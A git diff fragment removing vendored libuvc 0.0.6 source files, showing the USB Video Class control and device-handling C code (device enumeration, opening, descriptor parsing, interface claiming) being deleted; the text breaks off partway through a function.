- */
-int uvc_set_ctrl(uvc_device_handle_t *devh, uint8_t unit, uint8_t ctrl, void *data, int len) {
-  return libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    ctrl << 8,
-    unit << 8 | devh->info->ctrl_if.bInterfaceNumber,		// XXX saki
-    data,
-    len,
-    0 /* timeout */);
-}
-
-/***** INTERFACE CONTROLS *****/
-uvc_error_t uvc_get_power_mode(uvc_device_handle_t *devh, enum uvc_device_power_mode *mode, enum uvc_req_code req_code) {
-  uint8_t mode_char;
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_VC_VIDEO_POWER_MODE_CONTROL << 8,
-    devh->info->ctrl_if.bInterfaceNumber,	// XXX saki
-    &mode_char,
-    sizeof(mode_char),
-    0);
-
-  if (ret == 1) {
-    *mode = mode_char;
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-uvc_error_t uvc_set_power_mode(uvc_device_handle_t *devh, enum uvc_device_power_mode mode) {
-  uint8_t mode_char = mode;
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_VC_VIDEO_POWER_MODE_CONTROL << 8,
-    devh->info->ctrl_if.bInterfaceNumber,	// XXX saki
-    &mode_char,
-    sizeof(mode_char),
-    0);
-
-  if (ret == 1)
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @todo Request Error Code Control (UVC 1.5, 4.2.1.2) */
diff --git a/thirdparty/libuvc-0.0.6/src/device.c b/thirdparty/libuvc-0.0.6/src/device.c
deleted file mode 100644
index a987735..0000000
--- a/thirdparty/libuvc-0.0.6/src/device.c
+++ /dev/null
@@ -1,1791 +0,0 @@
-/*********************************************************************
-* Software License Agreement (BSD License)
-*
-*  Copyright (C) 2010-2012 Ken Tossell
-*  All rights reserved.
-*
-*  Redistribution and use in source and binary forms, with or without
-*  modification, are permitted provided that the following conditions
-*  are met:
-*
-*   * Redistributions of source code must retain the above copyright
-*     notice, this list of conditions and the following disclaimer.
-*   * Redistributions in binary form must reproduce the above
-*     copyright notice, this list of conditions and the following
-*     disclaimer in the documentation and/or other materials provided
-*     with the distribution.
-*   * Neither the name of the author nor other contributors may be
-*     used to endorse or promote products derived from this software
-*     without specific prior written permission.
-*
-*  THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-*  "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-*  LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
-*  FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
-*  COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
-*  INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
-*  BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
-*  LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-*  CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
-*  LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
-*  ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
-*  POSSIBILITY OF SUCH DAMAGE.
-*********************************************************************/
-/**
- * @defgroup device Device handling and enumeration
- * @brief Support for finding, inspecting and opening UVC devices
- */
-
-#include "libuvc/libuvc.h"
-#include "libuvc/libuvc_internal.h"
-
-int uvc_already_open(uvc_context_t *ctx, struct libusb_device *usb_dev);
-void uvc_free_devh(uvc_device_handle_t *devh);
-
-uvc_error_t uvc_get_device_info(uvc_device_t *dev, uvc_device_info_t **info);
-void uvc_free_device_info(uvc_device_info_t *info);
-
-uvc_error_t uvc_scan_control(uvc_device_t *dev, uvc_device_info_t *info);
-uvc_error_t uvc_parse_vc(uvc_device_t *dev,
-			 uvc_device_info_t *info,
-			 const unsigned char *block, size_t block_size);
-uvc_error_t uvc_parse_vc_selector_unit(uvc_device_t *dev,
-					uvc_device_info_t *info,
-					const unsigned char *block, size_t block_size);
-uvc_error_t uvc_parse_vc_extension_unit(uvc_device_t *dev,
-					uvc_device_info_t *info,
-					const unsigned char *block,
-					size_t block_size);
-uvc_error_t uvc_parse_vc_header(uvc_device_t *dev,
-				uvc_device_info_t *info,
-				const unsigned char *block, size_t block_size);
-uvc_error_t uvc_parse_vc_input_terminal(uvc_device_t *dev,
-					uvc_device_info_t *info,
-					const unsigned char *block,
-					size_t block_size);
-uvc_error_t uvc_parse_vc_processing_unit(uvc_device_t *dev,
-					 uvc_device_info_t *info,
-					 const unsigned char *block,
-					 size_t block_size);
-
-uvc_error_t uvc_scan_streaming(uvc_device_t *dev,
-			       uvc_device_info_t *info,
-			       int interface_idx);
-uvc_error_t uvc_parse_vs(uvc_device_t *dev,
-			 uvc_device_info_t *info,
-			 uvc_streaming_interface_t *stream_if,
-			 const unsigned char *block, size_t block_size);
-uvc_error_t uvc_parse_vs_format_uncompressed(uvc_streaming_interface_t *stream_if,
-					     const unsigned char *block,
-					     size_t block_size);
-uvc_error_t uvc_parse_vs_format_mjpeg(uvc_streaming_interface_t *stream_if,
-					     const unsigned char *block,
-					     size_t block_size);
-uvc_error_t uvc_parse_vs_frame_uncompressed(uvc_streaming_interface_t *stream_if,
-					    const unsigned char *block,
-					    size_t block_size);
-uvc_error_t uvc_parse_vs_frame_format(uvc_streaming_interface_t *stream_if,
-					    const unsigned char *block,
-					    size_t block_size);
-uvc_error_t uvc_parse_vs_frame_frame(uvc_streaming_interface_t *stream_if,
-					    const unsigned char *block,
-					    size_t block_size);
-uvc_error_t uvc_parse_vs_input_header(uvc_streaming_interface_t *stream_if,
-				      const unsigned char *block,
-				      size_t block_size);
-
-void LIBUSB_CALL _uvc_status_callback(struct libusb_transfer *transfer);
-
-/** @internal
- * @brief Test whether the specified USB device has been opened as a UVC device
- * @ingroup device
- *
- * @param ctx Context in which to search for the UVC device
- * @param usb_dev USB device to find
- * @return true if the device is open in this context
- */
-int uvc_already_open(uvc_context_t *ctx, struct libusb_device *usb_dev) {
-  uvc_device_handle_t *devh;
-
-  DL_FOREACH(ctx->open_devices, devh) {
-    if (usb_dev == devh->dev->usb_dev)
-      return 1;
-  }
-
-  return 0;
-}
-
-/** @brief Finds a camera identified by vendor, product and/or serial number
- * @ingroup device
- *
- * @param[in] ctx UVC context in which to search for the camera
- * @param[out] dev Reference to the camera, or NULL if not found
- * @param[in] vid Vendor ID number, optional
- * @param[in] pid Product ID number, optional
- * @param[in] sn Serial number or NULL
- * @return Error finding device or UVC_SUCCESS
- */
-uvc_error_t uvc_find_device(
-    uvc_context_t *ctx, uvc_device_t **dev,
-    int vid, int pid, const char *sn) {
-  uvc_error_t ret = UVC_SUCCESS;
-
-  uvc_device_t **list;
-  uvc_device_t *test_dev;
-  int dev_idx;
-  int found_dev;
-
-  UVC_ENTER();
-
-  ret = uvc_get_device_list(ctx, &list);
-
-  if (ret != UVC_SUCCESS) {
-    UVC_EXIT(ret);
-    return ret;
-  }
-
-  dev_idx = 0;
-  found_dev = 0;
-
-  while (!found_dev && (test_dev = list[dev_idx++]) != NULL) {
-    uvc_device_descriptor_t *desc;
-
-    if (uvc_get_device_descriptor(test_dev, &desc) != UVC_SUCCESS)
-      continue;
-
-    if ((!vid || desc->idVendor == vid)
-        && (!pid || desc->idProduct == pid)
-        && (!sn || (desc->serialNumber && !strcmp(desc->serialNumber, sn))))
-      found_dev = 1;
-
-    uvc_free_device_descriptor(desc);
-  }
-
-  if (found_dev)
-    uvc_ref_device(test_dev);
-
-  uvc_free_device_list(list, 1);
-
-  if (found_dev) {
-    *dev = test_dev;
-    UVC_EXIT(UVC_SUCCESS);
-    return UVC_SUCCESS;
-  } else {
-    UVC_EXIT(UVC_ERROR_NO_DEVICE);
-    return UVC_ERROR_NO_DEVICE;
-  }
-}
-
-/** @brief Finds all cameras identified by vendor, product and/or serial number
- * @ingroup device
- *
- * @param[in] ctx UVC context in which to search for the camera
- * @param[out] devs List of matching cameras
- * @param[in] vid Vendor ID number, optional
- * @param[in] pid Product ID number, optional
- * @param[in] sn Serial number or NULL
- * @return Error finding device or UVC_SUCCESS
- */
-uvc_error_t uvc_find_devices(
-    uvc_context_t *ctx, uvc_device_t ***devs,
-    int vid, int pid, const char *sn) {
-  uvc_error_t ret = UVC_SUCCESS;
-
-  uvc_device_t **list;
-  uvc_device_t *test_dev;
-  int dev_idx;
-  int found_dev;
-
-  uvc_device_t **list_internal;
-  int num_uvc_devices;
-
-  UVC_ENTER();
-
-  ret = uvc_get_device_list(ctx, &list);
-
-  if (ret != UVC_SUCCESS) {
-    UVC_EXIT(ret);
-    return ret;
-  }
-
-  num_uvc_devices = 0;
-  dev_idx = 0;
-  found_dev = 0;
-
-  list_internal = malloc(sizeof(*list_internal));
-  *list_internal = NULL;
-
-  while ((test_dev = list[dev_idx++]) != NULL) {
-    uvc_device_descriptor_t *desc;
-
-    if (uvc_get_device_descriptor(test_dev, &desc) != UVC_SUCCESS)
-      continue;
-
-    if ((!vid || desc->idVendor == vid)
-        && (!pid || desc->idProduct == pid)
-        && (!sn || (desc->serialNumber && !strcmp(desc->serialNumber, sn)))) {
-      found_dev = 1;
-      uvc_ref_device(test_dev);
-
-      num_uvc_devices++;
-      list_internal = realloc(list_internal, (num_uvc_devices + 1) * sizeof(*list_internal));
-
-      list_internal[num_uvc_devices - 1] = test_dev;
-      list_internal[num_uvc_devices] = NULL;
-    }
-
-    uvc_free_device_descriptor(desc);
-  }
-
-  uvc_free_device_list(list, 1);
-
-  if (found_dev) {
-    *devs = list_internal;
-    UVC_EXIT(UVC_SUCCESS);
-    return UVC_SUCCESS;
-  } else {
-    UVC_EXIT(UVC_ERROR_NO_DEVICE);
-    return UVC_ERROR_NO_DEVICE;
-  }
-}
-
-/** @brief Get the number of the bus to which the device is attached
- * @ingroup device
- */
-uint8_t uvc_get_bus_number(uvc_device_t *dev) {
-  return libusb_get_bus_number(dev->usb_dev);
-}
-
-/** @brief Get the number assigned to the device within its bus
- * @ingroup device
- */
-uint8_t uvc_get_device_address(uvc_device_t *dev) {
-  return libusb_get_device_address(dev->usb_dev);
-}
-
-/** @brief Open a UVC device
- * @ingroup device
- *
- * @param dev Device to open
- * @param[out] devh Handle on opened device
- * @return Error opening device or SUCCESS
- */
-uvc_error_t uvc_open(
-    uvc_device_t *dev,
-    uvc_device_handle_t **devh) {
-  uvc_error_t ret;
-  struct libusb_device_handle *usb_devh;
-  uvc_device_handle_t *internal_devh;
-  struct libusb_device_descriptor desc;
-
-  UVC_ENTER();
-
-  ret = libusb_open(dev->usb_dev, &usb_devh);
-  UVC_DEBUG("libusb_open() = %d", ret);
-
-  if (ret != UVC_SUCCESS) {
-    UVC_EXIT(ret);
-    return ret;
-  }
-
-  uvc_ref_device(dev);
-
-  internal_devh = calloc(1, sizeof(*internal_devh));
-  internal_devh->dev = dev;
-  internal_devh->usb_devh = usb_devh;
-
-  ret = uvc_get_device_info(dev, &(internal_devh->info));
-
-  if (ret != UVC_SUCCESS)
-    goto fail;
-
-  UVC_DEBUG("claiming control interface %d", internal_devh->info->ctrl_if.bInterfaceNumber);
-  ret = uvc_claim_if(internal_devh, internal_devh->info->ctrl_if.bInterfaceNumber);
-  if (ret != UVC_SUCCESS)
-    goto fail;
-
-  libusb_get_device_descriptor(dev->usb_dev, &desc);
-  internal_devh->is_isight = (desc.idVendor == 0x05ac && desc.idProduct == 0x8501);
-
-  if (internal_devh->info->ctrl_if.bEndpointAddress) {
-    internal_devh->status_xfer = libusb_alloc_transfer(0);
-    if (!internal_devh->status_xfer) {
-      ret = UVC_ERROR_NO_MEM;
-      goto fail;
-    }
-
-    libusb_fill_interrupt_transfer(internal_devh->status_xfer,
-                                   usb_devh,
-                                   internal_devh->info->ctrl_if.bEndpointAddress,
-                                   internal_devh->status_buf,
-                                   sizeof(internal_devh->status_buf),
-                                   _uvc_status_callback,
-                                   internal_devh,
-                                   0);
-    ret = libusb_submit_transfer(internal_devh->status_xfer);
-    UVC_DEBUG("libusb_submit_transfer() = %d", ret);
-
-    if (ret) {
-      fprintf(stderr,
-              "uvc: device has a status interrupt endpoint, but unable to read from it\n");
-      goto fail;
-    }
-  }
-
-  if (dev->ctx->own_usb_ctx && dev->ctx->open_devices == NULL) {
-    /* Since this is our first device, we need to spawn the event handler thread */
-    uvc_start_handler_thread(dev->ctx);
-  }
-
-  DL_APPEND(dev->ctx->open_devices, internal_devh);
-  *devh = internal_devh;
-
-  UVC_EXIT(ret);
-
-  return ret;
-
- fail:
-  if ( internal_devh->info ) {
-    uvc_release_if(internal_devh, internal_devh->info->ctrl_if.bInterfaceNumber);
-  }
-  libusb_close(usb_devh);
-  uvc_unref_device(dev);
-  uvc_free_devh(internal_devh);
-
-  UVC_EXIT(ret);
-
-  return ret;
-}
-
-/**
- * @internal
- * @brief Parses the complete device descriptor for a device
- * @ingroup device
- * @note Free *info with uvc_free_device_info when you're done
- *
- * @param dev Device to parse descriptor for
- * @param info Where to store a pointer to the new info struct
- */
-uvc_error_t uvc_get_device_info(uvc_device_t *dev,
-				uvc_device_info_t **info) {
-  uvc_error_t ret;
-  uvc_device_info_t *internal_info;
-
-  UVC_ENTER();
-
-  internal_info = calloc(1, sizeof(*internal_info));
-  if (!internal_info) {
-    UVC_EXIT(UVC_ERROR_NO_MEM);
-    return UVC_ERROR_NO_MEM;
-  }
-
-  if (libusb_get_config_descriptor(dev->usb_dev,
-				   0,
-				   &(internal_info->config)) != 0) {
-    free(internal_info);
-    UVC_EXIT(UVC_ERROR_IO);
-    return UVC_ERROR_IO;
-  }
-
-  ret = uvc_scan_control(dev, internal_info);
-  if (ret != UVC_SUCCESS) {
-    uvc_free_device_info(internal_info);
-    UVC_EXIT(ret);
-    return ret;
-  }
-
-  *info = internal_info;
-
-  UVC_EXIT(ret);
-  return ret;
-}
-
-/**
- * @internal
- * @brief Frees the device descriptor for a device
- * @ingroup device
- *
- * @param info Which device info block to free
- */
-void uvc_free_device_info(uvc_device_info_t *info) {
-  uvc_input_terminal_t *input_term, *input_term_tmp;
-  uvc_processing_unit_t *proc_unit, *proc_unit_tmp;
-  uvc_extension_unit_t *ext_unit, *ext_unit_tmp;
-
-  uvc_streaming_interface_t *stream_if, *stream_if_tmp;
-  uvc_format_desc_t *format, *format_tmp;
-  uvc_frame_desc_t *frame, *frame_tmp;
-
-  UVC_ENTER();
-
-  DL_FOREACH_SAFE(info->ctrl_if.input_term_descs, input_term, input_term_tmp) {
-    DL_DELETE(info->ctrl_if.input_term_descs, input_term);
-    free(input_term);
-  }
-
-  DL_FOREACH_SAFE(info->ctrl_if.processing_unit_descs, proc_unit, proc_unit_tmp) {
-    DL_DELETE(info->ctrl_if.processing_unit_descs, proc_unit);
-    free(proc_unit);
-  }
-
-  DL_FOREACH_SAFE(info->ctrl_if.extension_unit_descs, ext_unit, ext_unit_tmp) {
-    DL_DELETE(info->ctrl_if.extension_unit_descs, ext_unit);
-    free(ext_unit);
-  }
-
-  DL_FOREACH_SAFE(info->stream_ifs, stream_if, stream_if_tmp) {
-    DL_FOREACH_SAFE(stream_if->format_descs, format, format_tmp) {
-      DL_FOREACH_SAFE(format->frame_descs, frame, frame_tmp) {
-        if (frame->intervals)
-          free(frame->intervals);
-
-        DL_DELETE(format->frame_descs, frame);
-        free(frame);
-      }
-
-      DL_DELETE(stream_if->format_descs, format);
-      free(format);
-    }
-
-    DL_DELETE(info->stream_ifs, stream_if);
-    free(stream_if);
-  }
-
-  if (info->config)
-    libusb_free_config_descriptor(info->config);
-
-  free(info);
-
-  UVC_EXIT_VOID();
-}
-
-/**
- * @brief Get a descriptor that contains the general information about
- * a device
- * @ingroup device
- *
- * Free *desc with uvc_free_device_descriptor when you're done.
- *
- * @param dev Device to fetch information about
- * @param[out] desc Descriptor structure
- * @return Error if unable to fetch information, else SUCCESS
- */
-uvc_error_t uvc_get_device_descriptor(
-    uvc_device_t *dev,
-    uvc_device_descriptor_t **desc) {
-  uvc_device_descriptor_t *desc_internal;
-  struct libusb_device_descriptor usb_desc;
-  struct libusb_device_handle *usb_devh;
-  uvc_error_t ret;
-
-  UVC_ENTER();
-
-  ret = libusb_get_device_descriptor(dev->usb_dev, &usb_desc);
-
-  if (ret != UVC_SUCCESS) {
-    UVC_EXIT(ret);
-    return ret;
-  }
-
-  desc_internal = calloc(1, sizeof(*desc_internal));
-  desc_internal->idVendor = usb_desc.idVendor;
-  desc_internal->idProduct = usb_desc.idProduct;
-
-  if (libusb_open(dev->usb_dev, &usb_devh) == 0) {
-    unsigned char buf[64];
-
-    int bytes = libusb_get_string_descriptor_ascii(
-        usb_devh, usb_desc.iSerialNumber, buf, sizeof(buf));
-
-    if (bytes > 0)
-      desc_internal->serialNumber = strdup((const char*) buf);
-
-    bytes = libusb_get_string_descriptor_ascii(
-        usb_devh, usb_desc.iManufacturer, buf, sizeof(buf));
-
-    if (bytes > 0)
-      desc_internal->manufacturer = strdup((const char*) buf);
-
-    bytes = libusb_get_string_descriptor_ascii(
-        usb_devh, usb_desc.iProduct, buf, sizeof(buf));
-
-    if (bytes > 0)
-      desc_internal->product = strdup((const char*) buf);
-
-    libusb_close(usb_devh);
-  } else {
-    UVC_DEBUG("can't open device %04x:%04x, not fetching serial etc.",
-	      usb_desc.idVendor, usb_desc.idProduct);
-  }
-
-  *desc = desc_internal;
-
-  UVC_EXIT(ret);
-  return ret;
-}
-
-/**
- * @brief Frees a device descriptor created with uvc_get_device_descriptor
- * @ingroup device
- *
- * @param desc Descriptor to free
- */
-void uvc_free_device_descriptor(
-    uvc_device_descriptor_t *desc) {
-  UVC_ENTER();
-
-  if (desc->serialNumber)
-    free((void*) desc->serialNumber);
-
-  if (desc->manufacturer)
-    free((void*) desc->manufacturer);
-
-  if (desc->product)
-    free((void*) desc->product);
-
-  free(desc);
-
-  UVC_EXIT_VOID();
-}
-
-/**
- * @brief Get a list of the UVC devices attached to the system
- * @ingroup device
- *
- * @note Free the list with uvc_free_device_list when you're done.
- *
- * @param ctx UVC context in which to list devices
- * @param list List of uvc_device structures
- * @return Error if unable to list devices, else SUCCESS
- */
-uvc_error_t uvc_get_device_list(
-    uvc_context_t *ctx,
-    uvc_device_t ***list) {
-  struct libusb_device **usb_dev_list;
-  struct libusb_device *usb_dev;
-  int num_usb_devices;
-
-  uvc_device_t **list_internal;
-  int num_uvc_devices;
-
-  /* per device */
-  int dev_idx;
-  struct libusb_config_descriptor *config;
-  struct libusb_device_descriptor desc;
-  uint8_t got_interface;
-
-  /* per interface */
-  int interface_idx;
-  const struct libusb_interface *interface;
-
-  /* per altsetting */
-  int altsetting_idx;
-  const struct libusb_interface_descriptor *if_desc;
-
-  UVC_ENTER();
-
-  num_usb_devices = libusb_get_device_list(ctx->usb_ctx, &usb_dev_list);
-
-  if (num_usb_devices < 0) {
-    UVC_EXIT(UVC_ERROR_IO);
-    return UVC_ERROR_IO;
-  }
-
-  list_internal = malloc(sizeof(*list_internal));
-  *list_internal = NULL;
-
-  num_uvc_devices = 0;
-  dev_idx = -1;
-
-  while ((usb_dev = usb_dev_list[++dev_idx]) != NULL) {
-    got_interface = 0;
-
-    if (libusb_get_config_descriptor(usb_dev, 0, &config) != 0)
-      continue;
-
-    if ( libusb_get_device_descriptor ( usb_dev, &desc ) != LIBUSB_SUCCESS )
-      continue;
-
-    for (interface_idx = 0;
-	 !got_interface && interface_idx < config->bNumInterfaces;
-	 ++interface_idx) {
-      interface = &config->interface[interface_idx];
-
-      for (altsetting_idx = 0;
-	   !got_interface && altsetting_idx < interface->num_altsetting;
-	   ++altsetting_idx) {
-	if_desc = &interface->altsetting[altsetting_idx];
-
-        // Skip TIS cameras that definitely aren't UVC even though they might
-        // look that way
-
-        if ( 0x199e == desc.idVendor && desc.idProduct  >= 0x8201 &&
-            desc.idProduct <= 0x8208 ) {
-          continue;
-        }
-
-        // Special case for Imaging Source cameras
-	/* Video, Streaming */
-        if ( 0x199e == desc.idVendor && ( 0x8101 == desc.idProduct ||
-            0x8102 == desc.idProduct ) &&
-            if_desc->bInterfaceClass == 255 &&
-            if_desc->bInterfaceSubClass == 2 ) {
-	  got_interface = 1;
-	}
-
-	/* Video, Streaming */
-	if (if_desc->bInterfaceClass == 14 && if_desc->bInterfaceSubClass == 2) {
-	  got_interface = 1;
-	}
-      }
-    }
-
-    libusb_free_config_descriptor(config);
-
-    if (got_interface) {
-      uvc_device_t *uvc_dev = malloc(sizeof(*uvc_dev));
-      uvc_dev->ctx = ctx;
-      uvc_dev->ref = 0;
-      uvc_dev->usb_dev = usb_dev;
-      uvc_ref_device(uvc_dev);
-
-      num_uvc_devices++;
-      list_internal = realloc(list_internal, (num_uvc_devices + 1) * sizeof(*list_internal));
-
-      list_internal[num_uvc_devices - 1] = uvc_dev;
-      list_internal[num_uvc_devices] = NULL;
-
-      UVC_DEBUG("    UVC: %d", dev_idx);
-    } else {
-      UVC_DEBUG("non-UVC: %d", dev_idx);
-    }
-  }
-
-  libusb_free_device_list(usb_dev_list, 1);
-
-  *list = list_internal;
-
-  UVC_EXIT(UVC_SUCCESS);
-  return UVC_SUCCESS;
-}
-
-/**
- * @brief Frees a list of device structures created with uvc_get_device_list.
- * @ingroup device
- *
- * @param list Device list to free
- * @param unref_devices Decrement the reference counter for each device
- * in the list, and destroy any entries that end up with zero references
- */
-void uvc_free_device_list(uvc_device_t **list, uint8_t unref_devices) {
-  uvc_device_t *dev;
-  int dev_idx = 0;
-
-  UVC_ENTER();
-
-  if (unref_devices) {
-    while ((dev = list[dev_idx++]) != NULL) {
-      uvc_unref_device(dev);
-    }
-  }
-
-  free(list);
-
-  UVC_EXIT_VOID();
-}
-
-/**
- * @brief Get the uvc_device_t corresponding to an open device
- * @ingroup device
- *
- * @note Unref the uvc_device_t when you're done with it
- *
- * @param devh Device handle to an open UVC device
- */
-uvc_device_t *uvc_get_device(uvc_device_handle_t *devh) {
-  uvc_ref_device(devh->dev);
-  return devh->dev;
-}
-
-/**
- * @brief Get the underlying libusb device handle for an open device
- * @ingroup device
- *
- * This can be used to access other interfaces on the same device, e.g.
- * a webcam microphone.
- *
- * @note The libusb device handle is only valid while the UVC device is open;
- * it will be invalidated upon calling uvc_close.
- *
- * @param devh UVC device handle to an open device
- */
-libusb_device_handle *uvc_get_libusb_handle(uvc_device_handle_t *devh) {
-  return devh->usb_devh;
-}
-
-/**
- * @brief Get camera terminal descriptor for the open device.
- *
- * @note Do not modify the returned structure.
- * @note The returned structure is part of a linked list, but iterating through
- * it will make it no longer the camera terminal
- *
- * @param devh Device handle to an open UVC device
- */
-const uvc_input_terminal_t *uvc_get_camera_terminal(uvc_device_handle_t *devh) {
-  const uvc_input_terminal_t *term = uvc_get_input_terminals(devh);
-  while(term != NULL) {
-    if (term->wTerminalType == UVC_ITT_CAMERA) {
-      break;
-    }
-    else {
-      term = term->next;
-    }
-  }
-  return term;
-}
-
-
-/**
- * @brief Get input terminal descriptors for the open device.
- *
- * @note Do not modify the returned structure.
- * @note The returned structure is part of a linked list. Iterate through
- *       it by using the 'next' pointers.
- *
- * @param devh Device handle to an open UVC device
- */
-const uvc_input_terminal_t *uvc_get_input_terminals(uvc_device_handle_t *devh) {
-  return devh->info->ctrl_if.input_term_descs;
-}
-
-/**
- * @brief Get output terminal descriptors for the open device.
- *
- * @note Do not modify the returned structure.
- * @note The returned structure is part of a linked list. Iterate through
- *       it by using the 'next' pointers.
- *
- * @param devh Device handle to an open UVC device
- */
-const uvc_output_terminal_t *uvc_get_output_terminals(uvc_device_handle_t *devh) {
-  return NULL; /* @todo */
-}
-
-/**
- * @brief Get selector unit descriptors for the open device.
- *
- * @note Do not modify the returned structure.
- * @note The returned structure is part of a linked list. Iterate through
- *       it by using the 'next' pointers.
- *
- * @param devh Device handle to an open UVC device
- */
-const uvc_selector_unit_t *uvc_get_selector_units(uvc_device_handle_t *devh) {
-  return devh->info->ctrl_if.selector_unit_descs;
-}
-
-/**
- * @brief Get processing unit descriptors for the open device.
- *
- * @note Do not modify the returned structure.
- * @note The returned structure is part of a linked list. Iterate through
- *       it by using the 'next' pointers.
- *
- * @param devh Device handle to an open UVC device
- */
-const uvc_processing_unit_t *uvc_get_processing_units(uvc_device_handle_t *devh) {
-  return devh->info->ctrl_if.processing_unit_descs;
-}
-
-/**
- * @brief Get extension unit descriptors for the open device.
- *
- * @note Do not modify the returned structure.
- * @note The returned structure is part of a linked list. Iterate through
- *       it by using the 'next' pointers.
- *
- * @param devh Device handle to an open UVC device
- */
-const uvc_extension_unit_t *uvc_get_extension_units(uvc_device_handle_t *devh) {
-  return devh->info->ctrl_if.extension_unit_descs;
-}
-
-/**
- * @brief Increment the reference count for a device
- * @ingroup device
- *
- * @param dev Device to reference
- */
-void uvc_ref_device(uvc_device_t *dev) {
-  UVC_ENTER();
-
-  dev->ref++;
-  libusb_ref_device(dev->usb_dev);
-
-  UVC_EXIT_VOID();
-}
-
-/**
- * @brief Decrement the reference count for a device
- * @ingropu device
- * @note If the count reaches zero, the device will be discarded
- *
- * @param dev Device to unreference
- */
-void uvc_unref_device(uvc_device_t *dev) {
-  UVC_ENTER();
-
-  libusb_unref_device(dev->usb_dev);
-  dev->ref--;
-
-  if (dev->ref == 0)
-    free(dev);
-
-  UVC_EXIT_VOID();
-}
-
-/** @internal
- * Claim a UVC interface, detaching the kernel driver if necessary.
- * @ingroup device
- *
- * @param devh UVC device handle
- * @param idx UVC interface index
- */
-uvc_error_t uvc_claim_if(uvc_device_handle_t *devh, int idx) {
-  int ret = UVC_SUCCESS;
-
-  UVC_ENTER();
-
-  if ( devh->claimed & ( 1 << idx )) {
-    fprintf ( stderr, "attempt to claim already-claimed interface %d\n", idx );
-    UVC_EXIT(ret);
-    return ret;
-  }
-
-  /* Tell libusb to detach any active kernel drivers. libusb will keep track of whether
-   * it found a kernel driver for this interface. */
-  ret = libusb_detach_kernel_driver(devh->usb_devh, idx);
-
-  if (ret == UVC_SUCCESS || ret == LIBUSB_ERROR_NOT_FOUND || ret == LIBUSB_ERROR_NOT_SUPPORTED) {
-    UVC_DEBUG("claiming interface %d", idx);
-    if (!( ret = libusb_claim_interface(devh->usb_devh, idx))) {
-      devh->claimed |= ( 1 << idx );
-    }
-  } else {
-    UVC_DEBUG("not claiming interface %d: unable to detach kernel driver (%s)",
-              idx, uvc_strerror(ret));
-  }
-
-  UVC_EXIT(ret);
-  return ret;
-}
-
-/** @internal
- * Release a UVC interface.
- * @ingroup device
- *
- * @param devh UVC device handle
- * @param idx UVC interface index
- */
-uvc_error_t uvc_release_if(uvc_device_handle_t *devh, int idx) {
-  int ret = UVC_SUCCESS;
-
-  UVC_ENTER();
-  UVC_DEBUG("releasing interface %d", idx);
-  if (!( devh->claimed & ( 1 << idx ))) {
-    fprintf ( stderr, "attempt to release unclaimed interface %d\n", idx );
-    UVC_EXIT(ret);
-    return ret;
-  }
-
-  /* libusb_release_interface *should* reset the alternate setting to the first available,
-     but sometimes (e.g. on Darwin) it doesn't. Thus, we do it explicitly here.
-     This is needed to de-initialize certain cameras. */
-  libusb_set_interface_alt_setting(devh->usb_devh, idx, 0);
-  ret = libusb_release_interface(devh->usb_devh, idx);
-
-  if (UVC_SUCCESS == ret) {
-    devh->claimed &= ~( 1 << idx );
-    /* Reattach any kernel drivers that were disabled when we claimed this interface */
-    ret = libusb_attach_kernel_driver(devh->usb_devh, idx);
-
-    if (ret == UVC_SUCCESS) {
-      UVC_DEBUG("reattached kernel driver to interface %d", idx);
-    } else if (ret == LIBUSB_ERROR_NOT_FOUND || ret == LIBUSB_ERROR_NOT_SUPPORTED) {
-      ret = UVC_SUCCESS;  /* NOT_FOUND and NOT_SUPPORTED are OK: nothing to do */
-    } else {
-      UVC_DEBUG("error reattaching kernel driver to interface %d: %s",
-                idx, uvc_strerror(ret));
-    }
-  }
-
-  UVC_EXIT(ret);
-  return ret;
-}
-
-/** @internal
- * Find a device's VideoControl interface and process its descriptor
- * @ingroup device
- */
-uvc_error_t uvc_scan_control(uvc_device_t *dev, uvc_device_info_t *info) {
-  const struct libusb_interface_descriptor *if_desc;
-  uvc_error_t parse_ret, ret;
-  int interface_idx;
-  const unsigned char *buffer;
-  size_t buffer_left, block_size;
-
-  UVC_ENTER();
-
-  ret = UVC_SUCCESS;
-  if_desc = NULL;
-
-  uvc_device_descriptor_t* dev_desc;
-  int haveTISCamera = 0;
-  uvc_get_device_descriptor ( dev, &dev_desc );
-  if ( 0x199e == dev_desc->idVendor && ( 0x8101 == dev_desc->idProduct ||
-      0x8102 == dev_desc->idProduct )) {
-    haveTISCamera = 1;
-  }
-  uvc_free_device_descriptor ( dev_desc );
-
-  for (interface_idx = 0; interface_idx < info->config->bNumInterfaces; ++interface_idx) {
-    if_desc = &info->config->interface[interface_idx].altsetting[0];
-
-    if ( haveTISCamera && if_desc->bInterfaceClass == 255 && if_desc->bInterfaceSubClass == 1) // Video, Control
-      break;
-
-    if (if_desc->bInterfaceClass == 14 && if_desc->bInterfaceSubClass == 1) // Video, Control
-      break;
-
-    if_desc = NULL;
-  }
-
-  if (if_desc == NULL) {
-    UVC_EXIT(UVC_ERROR_INVALID_DEVICE);
-    return UVC_ERROR_INVALID_DEVICE;
-  }
-
-  info->ctrl_if.bInterfaceNumber = interface_idx;
-  if (if_desc->bNumEndpoints != 0) {
